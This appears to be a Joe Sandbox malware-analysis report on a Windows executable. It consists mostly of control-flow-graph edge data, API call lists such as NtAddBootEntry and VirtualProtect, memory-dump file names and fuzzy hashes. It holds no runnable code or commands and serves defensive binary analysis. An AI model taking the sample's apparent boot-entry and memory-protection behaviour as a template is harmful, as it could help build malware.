3701->3703 3702->3694 3702->3701 3704 7ff6c5322a73 3703->3704 3705 7ff6c53214a9 2 API calls 3704->3705 3706 7ff6c5322bd2 3705->3706 3842 7ff6c53214f4 3706->3842 3709 7ff6c53214c7 2 API calls 3710 7ff6c5322c99 3709->3710 3711 7ff6c53214c7 2 API calls 3710->3711 3712 7ff6c5322cb1 3711->3712 3713 7ff6c532145e 2 API calls 3712->3713 3714 7ff6c5322cbb 3713->3714 3715 7ff6c532145e 2 API calls 3714->3715 3716 7ff6c5322cc5 3715->3716 3716->3150 3718 7ff6c5321394 2 API calls 3717->3718 3719 7ff6c5321521 3718->3719 3720 7ff6c5321394 2 API calls 3719->3720 3721 7ff6c5321530 3720->3721 3722 7ff6c532153f 3721->3722 3723 7ff6c5321394 2 API calls 3721->3723 3724 7ff6c5321394 2 API calls 3722->3724 3723->3722 3725 7ff6c532154e 3724->3725 3726 7ff6c5321394 2 API calls 3725->3726 3727 7ff6c5321558 3726->3727 3728 7ff6c532155d 3727->3728 3729 7ff6c5321394 2 API calls 3727->3729 3730 7ff6c5321394 2 API calls 3728->3730 3729->3728 3731 7ff6c5321567 3730->3731 3732 7ff6c532156c 3731->3732 3733 7ff6c5321394 2 API calls 3731->3733 3734 7ff6c5321394 2 API calls 3732->3734 3733->3732 3735 7ff6c5321576 3734->3735 3736 7ff6c532157b 3735->3736 3737 7ff6c5321394 2 API calls 3735->3737 3738 7ff6c5321394 2 API calls 3736->3738 3737->3736 3739 7ff6c5321585 3738->3739 3740 7ff6c532158a 3739->3740 3741 7ff6c5321394 2 API calls 3739->3741 3742 7ff6c5321394 2 API calls 3740->3742 3741->3740 3743 7ff6c5321599 3742->3743 3744 7ff6c5321394 2 API calls 3743->3744 3745 7ff6c53215a3 3744->3745 3746 7ff6c53215a8 3745->3746 3747 7ff6c5321394 2 API calls 3745->3747 3748 7ff6c5321394 2 API calls 3746->3748 3747->3746 3749 7ff6c53215b7 3748->3749 3750 7ff6c5321394 2 API calls 3749->3750 3751 7ff6c53215c1 3750->3751 3752 7ff6c5321394 2 API calls 3751->3752 3753 7ff6c53215c6 3752->3753 3754 7ff6c5321394 2 API calls 3753->3754 3755 7ff6c53215d5 3754->3755 3756 7ff6c5321394 2 API calls 3755->3756 3757 7ff6c53215e4 3756->3757 3758 7ff6c5321394 2 API calls 3757->3758 3759 7ff6c53215f3 3758->3759 3759->3152 3761 
7ff6c5321394 2 API calls 3760->3761 3762 7ff6c5321567 3761->3762 3763 7ff6c532156c 3762->3763 3764 7ff6c5321394 2 API calls 3762->3764 3765 7ff6c5321394 2 API calls 3763->3765 3764->3763 3766 7ff6c5321576 3765->3766 3767 7ff6c532157b 3766->3767 3768 7ff6c5321394 2 API calls 3766->3768 3769 7ff6c5321394 2 API calls 3767->3769 3768->3767 3770 7ff6c5321585 3769->3770 3771 7ff6c532158a 3770->3771 3772 7ff6c5321394 2 API calls 3770->3772 3773 7ff6c5321394 2 API calls 3771->3773 3772->3771 3774 7ff6c5321599 3773->3774 3775 7ff6c5321394 2 API calls 3774->3775 3776 7ff6c53215a3 3775->3776 3777 7ff6c53215a8 3776->3777 3778 7ff6c5321394 2 API calls 3776->3778 3779 7ff6c5321394 2 API calls 3777->3779 3778->3777 3780 7ff6c53215b7 3779->3780 3781 7ff6c5321394 2 API calls 3780->3781 3782 7ff6c53215c1 3781->3782 3783 7ff6c5321394 2 API calls 3782->3783 3784 7ff6c53215c6 3783->3784 3785 7ff6c5321394 2 API calls 3784->3785 3786 7ff6c53215d5 3785->3786 3787 7ff6c5321394 2 API calls 3786->3787 3788 7ff6c53215e4 3787->3788 3789 7ff6c5321394 2 API calls 3788->3789 3790 7ff6c53215f3 3789->3790 3790->3686 3790->3690 3790->3694 3792 7ff6c5321394 2 API calls 3791->3792 3793 7ff6c53214f4 3792->3793 3794 7ff6c5321503 3793->3794 3795 7ff6c5321394 2 API calls 3793->3795 3796 7ff6c5321394 2 API calls 3794->3796 3795->3794 3797 7ff6c532150d 3796->3797 3798 7ff6c5321394 2 API calls 3797->3798 3799 7ff6c5321512 3798->3799 3800 7ff6c5321394 2 API calls 3799->3800 3801 7ff6c5321521 3800->3801 3802 7ff6c5321394 2 API calls 3801->3802 3803 7ff6c5321530 3802->3803 3804 7ff6c532153f 3803->3804 3805 7ff6c5321394 2 API calls 3803->3805 3806 7ff6c5321394 2 API calls 3804->3806 3805->3804 3807 7ff6c532154e 3806->3807 3808 7ff6c5321394 2 API calls 3807->3808 3809 7ff6c5321558 3808->3809 3810 7ff6c532155d 3809->3810 3811 7ff6c5321394 2 API calls 3809->3811 3812 7ff6c5321394 2 API calls 3810->3812 3811->3810 3813 7ff6c5321567 3812->3813 3814 7ff6c532156c 3813->3814 3815 7ff6c5321394 2 API calls 3813->3815 3816 
7ff6c5321394 2 API calls 3814->3816 3815->3814 3817 7ff6c5321576 3816->3817 3818 7ff6c532157b 3817->3818 3819 7ff6c5321394 2 API calls 3817->3819 3820 7ff6c5321394 2 API calls 3818->3820 3819->3818 3821 7ff6c5321585 3820->3821 3822 7ff6c532158a 3821->3822 3823 7ff6c5321394 2 API calls 3821->3823 3824 7ff6c5321394 2 API calls 3822->3824 3823->3822 3825 7ff6c5321599 3824->3825 3826 7ff6c5321394 2 API calls 3825->3826 3827 7ff6c53215a3 3826->3827 3828 7ff6c53215a8 3827->3828 3829 7ff6c5321394 2 API calls 3827->3829 3830 7ff6c5321394 2 API calls 3828->3830 3829->3828 3831 7ff6c53215b7 3830->3831 3832 7ff6c5321394 2 API calls 3831->3832 3833 7ff6c53215c1 3832->3833 3834 7ff6c5321394 2 API calls 3833->3834 3835 7ff6c53215c6 3834->3835 3836 7ff6c5321394 2 API calls 3835->3836 3837 7ff6c53215d5 3836->3837 3838 7ff6c5321394 2 API calls 3837->3838 3839 7ff6c53215e4 3838->3839 3840 7ff6c5321394 2 API calls 3839->3840 3841 7ff6c53215f3 3840->3841 3841->3686 3843 7ff6c5321503 3842->3843 3844 7ff6c5321394 2 API calls 3842->3844 3845 7ff6c5321394 2 API calls 3843->3845 3844->3843 3846 7ff6c532150d 3845->3846 3847 7ff6c5321394 2 API calls 3846->3847 3848 7ff6c5321512 3847->3848 3849 7ff6c5321394 2 API calls 3848->3849 3850 7ff6c5321521 3849->3850 3851 7ff6c5321394 2 API calls 3850->3851 3852 7ff6c5321530 3851->3852 3853 7ff6c532153f 3852->3853 3854 7ff6c5321394 2 API calls 3852->3854 3855 7ff6c5321394 2 API calls 3853->3855 3854->3853 3856 7ff6c532154e 3855->3856 3857 7ff6c5321394 2 API calls 3856->3857 3858 7ff6c5321558 3857->3858 3859 7ff6c532155d 3858->3859 3860 7ff6c5321394 2 API calls 3858->3860 3861 7ff6c5321394 2 API calls 3859->3861 3860->3859 3862 7ff6c5321567 3861->3862 3863 7ff6c532156c 3862->3863 3864 7ff6c5321394 2 API calls 3862->3864 3865 7ff6c5321394 2 API calls 3863->3865 3864->3863 3866 7ff6c5321576 3865->3866 3867 7ff6c532157b 3866->3867 3868 7ff6c5321394 2 API calls 3866->3868 3869 7ff6c5321394 2 API calls 3867->3869 3868->3867 3870 7ff6c5321585 3869->3870 3871 
7ff6c532158a 3870->3871 3872 7ff6c5321394 2 API calls 3870->3872 3873 7ff6c5321394 2 API calls 3871->3873 3872->3871 3874 7ff6c5321599 3873->3874 3875 7ff6c5321394 2 API calls 3874->3875 3876 7ff6c53215a3 3875->3876 3877 7ff6c53215a8 3876->3877 3878 7ff6c5321394 2 API calls 3876->3878 3879 7ff6c5321394 2 API calls 3877->3879 3878->3877 3880 7ff6c53215b7 3879->3880 3881 7ff6c5321394 2 API calls 3880->3881 3882 7ff6c53215c1 3881->3882 3883 7ff6c5321394 2 API calls 3882->3883 3884 7ff6c53215c6 3883->3884 3885 7ff6c5321394 2 API calls 3884->3885 3886 7ff6c53215d5 3885->3886 3887 7ff6c5321394 2 API calls 3886->3887 3888 7ff6c53215e4 3887->3888 3889 7ff6c5321394 2 API calls 3888->3889 3890 7ff6c53215f3 3889->3890 3890->3709 3892 7ff6c5321394 2 API calls 3891->3892 3893 7ff6c5321431 3892->3893 3894 7ff6c5321440 3893->3894 3895 7ff6c5321394 2 API calls 3893->3895 3896 7ff6c5321394 2 API calls 3894->3896 3895->3894 3897 7ff6c532144f 3896->3897 3898 7ff6c5321394 2 API calls 3897->3898 3899 7ff6c5321459 3898->3899 3900 7ff6c532145e 3899->3900 3901 7ff6c5321394 2 API calls 3899->3901 3902 7ff6c5321394 2 API calls 3900->3902 3901->3900 3903 7ff6c5321468 3902->3903 3904 7ff6c532146d 3903->3904 3905 7ff6c5321394 2 API calls 3903->3905 3906 7ff6c5321394 2 API calls 3904->3906 3905->3904 3907 7ff6c5321477 3906->3907 3908 7ff6c532147c 3907->3908 3909 7ff6c5321394 2 API calls 3907->3909 3910 7ff6c5321394 2 API calls 3908->3910 3909->3908 3911 7ff6c5321486 3910->3911 3912 7ff6c532148b 3911->3912 3913 7ff6c5321394 2 API calls 3911->3913 3914 7ff6c5321394 2 API calls 3912->3914 3913->3912 3915 7ff6c5321495 3914->3915 3916 7ff6c532149a 3915->3916 3917 7ff6c5321394 2 API calls 3915->3917 3918 7ff6c5321394 2 API calls 3916->3918 3917->3916 3919 7ff6c53214a4 3918->3919 3920 7ff6c53214a9 3919->3920 3921 7ff6c5321394 2 API calls 3919->3921 3922 7ff6c5321394 2 API calls 3920->3922 3921->3920 3923 7ff6c53214b3 3922->3923 3924 7ff6c5321394 2 API calls 3923->3924 3925 7ff6c53214b8 3924->3925 3926 
7ff6c5321394 2 API calls 3925->3926 3927 7ff6c53214c7 3926->3927 3928 7ff6c5321394 2 API calls 3927->3928 3929 7ff6c53214d6 3928->3929 3930 7ff6c5321394 2 API calls 3929->3930 3931 7ff6c53214e5 3930->3931 3932 7ff6c5321394 2 API calls 3931->3932 3933 7ff6c53214f4 3932->3933 3934 7ff6c5321503 3933->3934 3935 7ff6c5321394 2 API calls 3933->3935 3936 7ff6c5321394 2 API calls 3934->3936 3935->3934 3937 7ff6c532150d 3936->3937 3938 7ff6c5321394 2 API calls 3937->3938 3939 7ff6c5321512 3938->3939 3940 7ff6c5321394 2 API calls 3939->3940 3941 7ff6c5321521 3940->3941 3942 7ff6c5321394 2 API calls 3941->3942 3943 7ff6c5321530 3942->3943 3944 7ff6c532153f 3943->3944 3945 7ff6c5321394 2 API calls 3943->3945 3946 7ff6c5321394 2 API calls 3944->3946 3945->3944 3947 7ff6c532154e 3946->3947 3948 7ff6c5321394 2 API calls 3947->3948 3949 7ff6c5321558 3948->3949 3950 7ff6c532155d 3949->3950 3951 7ff6c5321394 2 API calls 3949->3951 3952 7ff6c5321394 2 API calls 3950->3952 3951->3950 3953 7ff6c5321567 3952->3953 3954 7ff6c532156c 3953->3954 3955 7ff6c5321394 2 API calls 3953->3955 3956 7ff6c5321394 2 API calls 3954->3956 3955->3954 3957 7ff6c5321576 3956->3957 3958 7ff6c532157b 3957->3958 3959 7ff6c5321394 2 API calls 3957->3959 3960 7ff6c5321394 2 API calls 3958->3960 3959->3958 3961 7ff6c5321585 3960->3961 3962 7ff6c532158a 3961->3962 3963 7ff6c5321394 2 API calls 3961->3963 3964 7ff6c5321394 2 API calls 3962->3964 3963->3962 3965 7ff6c5321599 3964->3965 3966 7ff6c5321394 2 API calls 3965->3966 3967 7ff6c53215a3 3966->3967 3968 7ff6c53215a8 3967->3968 3969 7ff6c5321394 2 API calls 3967->3969 3970 7ff6c5321394 2 API calls 3968->3970 3969->3968 3971 7ff6c53215b7 3970->3971 3972 7ff6c5321394 2 API calls 3971->3972 3973 7ff6c53215c1 3972->3973 3974 7ff6c5321394 2 API calls 3973->3974 3975 7ff6c53215c6 3974->3975 3976 7ff6c5321394 2 API calls 3975->3976 3977 7ff6c53215d5 3976->3977 3978 7ff6c5321394 2 API calls 3977->3978 3979 7ff6c53215e4 3978->3979 3980 7ff6c5321394 2 API calls 
                                                        Control-flow graph edge data (interactive graph residue); the functions and API calls it records:
                                                        • 7ff6c5321394: malloc (7ff6c53283f0), then NtAddBootEntry (7ff6c53213c6)
                                                        • 7ff6c5321440-7ff6c53215f3: a long straight-line sequence of basic blocks, each calling into 7ff6c5321394 ("2 API calls"), reached from several callers
                                                        • 7ff6c5321000: __set_app_type; 7ff6c5321e00 -> 7ff6c5328980 __setusermatherr
                                                        • 7ff6c5321800: fprintf (7ff6c5321835)
                                                        • 7ff6c5322320: strlen
                                                        • 7ff6c5321e65 and 7ff6c5321e10: signal
                                                        • 7ff6c5322104: EnterCriticalSection, TlsGetValue, GetLastError, LeaveCriticalSection, free, DeleteCriticalSection
                                                        • 7ff6c532216f: InitializeCriticalSection
                                                        • 7ff6c5322050: EnterCriticalSection, free, LeaveCriticalSection
                                                        • 7ff6c5321fd0: EnterCriticalSection, LeaveCriticalSection
                                                        • 7ff6c5321a70 and 7ff6c5321ab3: VirtualProtect (7ff6c53219e9); 7ff6c5321ab3 also calls 7ff6c5321ba0 (4 API calls)

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: ef29aa538128acd76b923304bcce7985f3f41b3f1f1ed9bc751512ae57c1cafe
                                                        • Instruction ID: 15ffc065d0f7ebe64b7d155960116db35449b2efb0eac399893ae6816e708396
                                                        • Opcode Fuzzy Hash: ef29aa538128acd76b923304bcce7985f3f41b3f1f1ed9bc751512ae57c1cafe
                                                        • Instruction Fuzzy Hash: 6B514A25E29E4685F7119F15EE4937923A0BF44F82F849031D98DC77A3EE3CAC818391

                                                        Control-flow Graph

                                                        APIs
                                                        • NtAddBootEntry.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5321156), ref: 00007FF6C53213F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: BootEntry
                                                        • String ID:
                                                        • API String ID: 3727276938-0
                                                        • Opcode ID: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
                                                        • Instruction ID: a726939c0f15b6e17741530ee5b225b0094f06be47af9284b445ff061ee8a4d9
                                                        • Opcode Fuzzy Hash: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
                                                        • Instruction Fuzzy Hash: 53F0EC7192CF4282D615CF51FC6442A7760FB98B81F008835EADC83726EF3CE8508B81
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
                                                        • String ID:
                                                        • API String ID: 3604702941-3916222277
                                                        • Opcode ID: 611dad86bca879dc2385dc59deb561307969c2c5d8425c439f0e58d6370a3a28
                                                        • Instruction ID: 579118dad8b2cb72991d6b88deafb29860b59f041c37b8eca2f791e9e6815332
                                                        • Opcode Fuzzy Hash: 611dad86bca879dc2385dc59deb561307969c2c5d8425c439f0e58d6370a3a28
                                                        • Instruction Fuzzy Hash: 14539E25C2CAC284F7218F29EC063F46760BF95B46F845235D9CCD69A6FF6C6A84C364

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: memset$wcscatwcscpywcslen
                                                        • String ID: $0$0$@$@
                                                        • API String ID: 4263182637-1413854666
                                                        • Opcode ID: 4d512575b54fdde5b2efe29d73fe70a91ca72ef17a151f0fc642e1fa6fb95c69
                                                        • Instruction ID: 7e75a99db70504cfab90d917eec25af5abcb8c540519d62b4ae0653372850428
                                                        • Opcode Fuzzy Hash: 4d512575b54fdde5b2efe29d73fe70a91ca72ef17a151f0fc642e1fa6fb95c69
                                                        • Instruction Fuzzy Hash: D8B16F2191CAC285F3218F24EC493BAB7A0FF94B45F404135EACD96A9AEF7DD945CB40

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                        • String ID: 0$X$`
                                                        • API String ID: 329590056-2527496196
                                                        • Opcode ID: 7b2a33b9fae322ee24d76996efd72da4f7d36b3ec6a72cb06d8734951d1eeac8
                                                        • Instruction ID: 19f420034747452a50eb97ed6b97d1b47418de8dff91dff612ccea08a414011f
                                                        • Opcode Fuzzy Hash: 7b2a33b9fae322ee24d76996efd72da4f7d36b3ec6a72cb06d8734951d1eeac8
                                                        • Instruction Fuzzy Hash: FA027C32918B8586E7208F15EC453BA77A0FB84BA5F404235EADC83BA6EF7CD585C750

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF6C532A4B4,00007FF6C532A4B4,?,?,00007FF6C5320000,?,00007FF6C5321991), ref: 00007FF6C5321C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF6C532A4B4,00007FF6C532A4B4,?,?,00007FF6C5320000,?,00007FF6C5321991), ref: 00007FF6C5321CC7
                                                        • memcpy.MSVCRT ref: 00007FF6C5321CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF6C532A4B4,00007FF6C532A4B4,?,?,00007FF6C5320000,?,00007FF6C5321991), ref: 00007FF6C5321D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 0deee9cd0ba2319482cc86d0a3ef914e3088b52e5e70b18c8ce3c0687bb0a018
                                                        • Instruction ID: abd08136541581b1b779cd19896b0540fea68b3fafb41a153a55b07aa20e7431
                                                        • Opcode Fuzzy Hash: 0deee9cd0ba2319482cc86d0a3ef914e3088b52e5e70b18c8ce3c0687bb0a018
                                                        • Instruction Fuzzy Hash: 71419065A29E5681EA518F45DD486B827A0FB84FC2F954132DE8DC3792EE3CED81C380

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: 6202ad9642b61ede5142cafd6873fb990c29b47e697254827fe3e53e840c4266
                                                        • Instruction ID: e8bcb0c1d258cb0ca3e4c13d6666a5f7334a0bd7c61d117cbdb0ba1f7aed672b
                                                        • Opcode Fuzzy Hash: 6202ad9642b61ede5142cafd6873fb990c29b47e697254827fe3e53e840c4266
                                                        • Instruction Fuzzy Hash: 5121DE25A29E0282FA659F41DD483752360BF14F92F850031D98EC7EB5EF7DBC868794

                                                        Control-flow Graph

                                                        Graph rendering omitted (the executed / not-executed colouring of the rendered graph is not recoverable). Basic blocks 7ff6c5321e10 through 7ff6c5321f69 (25 blocks); the function calls 7ff6c5328990 from block 7ff6c5321efb and signal from blocks 7ff6c5321ed3, 7ff6c5321eea and 7ff6c5321f12; block 7ff6c5321f60-7ff6c5321f69 is the common exit with no successors.
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 427cd3d36267b3fa69e89bab234189796d32b27608e303035859b8d0eeaeffb8
                                                        • Instruction ID: 4a53892e93a9ea3e4da46bb2f04c54cc7e56f6a6ba9e2914b43590140029f394
                                                        • Opcode Fuzzy Hash: 427cd3d36267b3fa69e89bab234189796d32b27608e303035859b8d0eeaeffb8
                                                        • Instruction Fuzzy Hash: 96218121F2C90651FB755E149E8837A12819F84F66F258631DEBDC37DAFE2CAC8182D1

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5321247), ref: 00007FF6C53219F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 980c9c0f67357cad808cfc73b9f707eed9ad7f9cf4014a5acad94c34b8aa7a4b
                                                        • Instruction ID: dbb7ae90e76724d601de16417cf804158cd0ce57da5280343d5608fe2f929622
                                                        • Opcode Fuzzy Hash: 980c9c0f67357cad808cfc73b9f707eed9ad7f9cf4014a5acad94c34b8aa7a4b
                                                        • Instruction Fuzzy Hash: C5516C36F28A46C6EB108F25DD497B82761BB14F96F444131DA9C87796EE3CEC86C780

                                                        Control-flow Graph

                                                        Graph rendering omitted (the executed / not-executed colouring of the rendered graph is not recoverable). Basic blocks 7ff6c5321800-7ff6c5321810, 7ff6c5321812-7ff6c5321822, 7ff6c5321824 and 7ff6c532182b-7ff6c5321867; the entry block branches to either of the two middle blocks, both of which fall into the last block, which calls 7ff6c5322290 and fprintf.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmp
